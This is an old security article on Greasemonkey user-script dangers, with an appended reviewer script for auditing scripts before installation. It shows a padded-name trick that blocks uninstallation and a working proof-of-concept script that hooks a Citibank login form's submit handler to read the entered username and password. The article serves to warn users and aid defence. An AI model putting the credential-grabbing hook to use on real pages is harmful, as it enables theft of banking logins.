New apps: Super Spyer

Firefox Greasemonkey

       ---------------------------------------------------
	  Vision of danger: The Firefox Greasemonkey
       ---------------------------------------------------
	 written by Piotr Bania <bania.piotr@gmail.com>

	     [___ http://pb.specialised.info ___]

   Original location: http://pb.specialised.info/all/articles/monkey.txt

  -----------------
   0. DISCLAIMER
  -----------------

	Author takes no responsibility for any actions with provided information 
        or codes. The copyright for any material created by the author is reserved. 
        Any duplication of codes or texts provided here in electronic or printed 
	publications (including compiled code) is not permitted without the author's 
	agreement.

  -----------------
   I. INTRODUCTION
  -----------------

	Greasemonkey is a free and currently very popular extension for the Firefox 
	browser. This tool lets users add DHTML scripts to any web site 
	and change its original behaviour. It's a nice feature, nice for good
	and bad guys... This short paper was written to show what can happen if 
	a user runs a "bad" script; the idea is to show the danger itself.

  -----------------
   II. BAD SCRIPTS
  -----------------  

	A) MAKING "UNABLE TO UNINSTALL" SCRIPT

	A standard script usually starts with a special header (metadata tags), like this:
	--------// SNIP //--------
	// ==UserScript==
	// @name          Say Hello!
	// @namespace     http://youngpup.net/userscripts
	// @description	  Greets the world
	// @include       http://google.com/*
	// @include       http://www.google.com/*
	// @exclude       http://gmail.google.com/*
	// ==/UserScript==
	--------// SNIP //--------

	This information is used when installing, running and uninstalling Greasemonkey
	scripts. A script with a specially crafted @name metadata tag cannot be uninstalled
	automatically from within Firefox (the user must delete the file by hand). Here is a
	sample "bad" @name tag:

	--------// SNIP //--------
	// ==UserScript==
	// @name          Im a script <5000*SPACE_CHAR_:])		
	// ...
	--------// SNIP //--------

	During uninstallation of the script the window resizes and the only thing the user can do is 
	close it. A user who wants to delete the script must do it manually, by deleting 
	the file from the "{firefox profile dir}\extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}\
	chrome\greasemonkey\content\scripts\" dir.

	B) SPYING THE CITIBANK LOGIN PAGE

	A potential attacker can also write a script which steals data, as demonstrated below.
	There are plenty of other ideas; here we assume a scenario in which the attacker
	wants to grab a CITIBANK user's LOGIN and PASSWORD.

	Original website: 

https://cib.ibanking-services.com/cib/login.jsp?FIORG=775&FIFID=125106986&id=1449852460

	(SPYER.user.js)
	--------// SNIP //--------
	// ==UserScript==
	// @name          Super Spyer :)  - (c) Piotr Bania <bania.piotr@gmail.com>
	// @namespace     http://pb.specialised.info
	// @description	  Shows potencial risk of Firefox scripting.
	// @include	  *
	// ==/UserScript==

	// We assume that the form used by Citibank is named "login", the login textbox is named 
	// "userid" and the password box is named "password" (look at the CITIBANK page source).
	// Citibank uses its own "onsubmit" routine, so we must execute it together with ours.

	(function() {
	var old_ons = document.login.onsubmit.toString();		// grab the old handler's source text
	var new_ons = "spy();" + "\r" + old_ons.substring(old_ons.indexOf("{") + 1,old_ons.lastIndexOf("}") - 1);
	document.login.onsubmit = new Function(new_ons);
	})();

	function spy() {
	alert("I have spyed you!!!\n\r\n\r\n\r-------------\n\rLOGIN: "+document.login.userid.value+"\n"+
	"PASSWORD: "+document.login.password.value+"\n\r-------------\n\r\n\r\n\rhttp://pb.specialised.info");
	}
	--------// SNIP //--------	

	Such stolen information can be transferred to the attacker's servers, email accounts, etc.
	There are many types and variations of such a scenario.
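
	The two patterns shown in A) and B) can be checked for before a script is installed.
	The following reviewer is an added example, not part of the original article or of
	Greasemonkey; the rule names, the 80-character limit and the sample script are assumptions.

```javascript
// Added example: static review of a user script before it is installed.
// Rule names and thresholds are assumptions chosen for illustration.
const MAX_NAME_LEN = 80;

// Parse the ==UserScript== header into { key: [raw values] }.
function parseMetadata(source) {
  const meta = {};
  let inBlock = false;
  for (const line of source.split(/\r?\n/)) {
    if (/^\s*\/\/\s*==UserScript==/.test(line)) { inBlock = true; continue; }
    if (/^\s*\/\/\s*==\/UserScript==/.test(line)) break;
    if (!inBlock) continue;
    // Values are kept untrimmed so padding inside @name stays measurable.
    const m = /^\s*\/\/\s*@(\S+)[ \t]*(.*)$/.exec(line);
    if (m) (meta[m[1]] = meta[m[1]] || []).push(m[2]);
  }
  return meta;
}

function auditUserScript(source) {
  const meta = parseMetadata(source);
  const findings = [];
  for (const name of meta.name || []) {
    if (name.length > MAX_NAME_LEN) findings.push("name-too-long");
    if (/\s{10,}/.test(name)) findings.push("name-whitespace-padding");
  }
  for (const pat of meta.include || []) {
    // "*" alone, or a scheme followed only by wildcards, matches every site.
    if (/^(\*|http(s|\*)?:\/\/\*(\/\*)?)$/.test(pat.trim())) findings.push("include-matches-all-sites");
  }
  // Everything from the end-of-header marker onwards is treated as the body.
  const body = source.slice(Math.max(0, source.indexOf("==/UserScript==")));
  if (/\.onsubmit\s*=/.test(body)) findings.push("replaces-onsubmit-handler");
  if (/password\s*\.value/i.test(body)) findings.push("reads-password-field");
  return findings;
}

// Constructed sample combining the padded @name from A) with the hooks from B).
const SAMPLE_SUSPICIOUS = ["// ==UserScript==",
  "// @name          Im a script" + " ".repeat(5000) + ":])",
  "// @include       *", "// ==/UserScript==",
  "document.login.onsubmit = new Function(hooked);",
  "var p = document.login.password.value;"].join("\n");
console.log(auditUserScript(SAMPLE_SUSPICIOUS));
```

	The findings are review hints only: a script can match none of these rules and still
	be hostile, so the script body should be read before installation as well.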

  ----------------------
   III. FINAL THOUGHTS
  ----------------------

	Using Greasemonkey can be fun and also dangerous; everything depends on the level of 
	the user's knowledge...

	I want to end this short article with words from Aaron Boodman (author of Greasemonkey):

	"All I can say is that just like any other software, you should think a tiny bit before 
	installing a user script... Make sure the author is someone you trust, or 
	at least in a social network you trust."

	Peace.
